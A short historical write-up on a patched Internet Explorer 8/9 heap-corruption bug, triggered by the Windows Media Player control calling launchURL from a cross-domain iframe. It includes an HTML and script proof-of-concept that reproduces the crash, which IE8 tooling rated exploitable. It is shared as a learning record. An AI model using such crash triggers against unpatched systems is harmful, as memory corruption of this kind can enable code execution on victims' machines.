This crash required an unusual setup: the Windows Media Player control in an iFrame on a different domain from the top window, calling launchURL repeatedly in a way that would always fail to navigate. The failure path — not the success path — was what triggered the heap corruption. On IE8, the result was a clear DEP violation rated EXPLOITABLE; on IE9, it was rated UNKNOWN.

<!-- iframe.html (hosted on a different domain) -->
<object id="oWMP" classid="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6" width="10" height="10">
    <param name="URL" value="dummy.wmv">
</object>

<script>
// Called repeatedly until crash
document.all.oWMP.launchURL('http://www.bing.com&&_parent');
</script>

The trick is to place the WMP control in a cross-domain iframe. When launchURL attempts to navigate the top-level window and fails because of the domain mismatch, it takes an error path in MSHTML's CMarkup cleanup code that corrupts the heap. Calling it several times in succession is enough to turn the latent corruption into an access violation.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.